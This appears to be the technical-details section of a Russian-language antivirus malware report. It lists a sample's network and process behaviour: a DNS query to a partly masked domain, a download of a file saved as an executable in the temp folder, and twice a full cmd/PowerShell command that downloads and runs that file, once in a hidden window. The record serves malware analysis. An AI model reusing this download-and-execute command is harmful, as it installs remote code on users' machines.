Техническая информация
- http://sp###led.com.my/system/helper/json/mang.ffk как %temp%\zzdfafjaka.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://sp###led.com.my/system/helper/json/mang.ffk','%TMP%\ZzDfAfjaka.exe');Start-Process '%TMP%\ZzDfAfjaka.exe';
- http://sp###led.com.my/system/helper/json/mang.ffk
- DNS ASK sp###led.com.my
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://sp###led.com.my/system/helper/json/mang.ffk','%TMP%\ZzDfAfjaka.exe');Start-Process '%TMP%\ZzDfAfjaka.exe';' (со скрытым окном)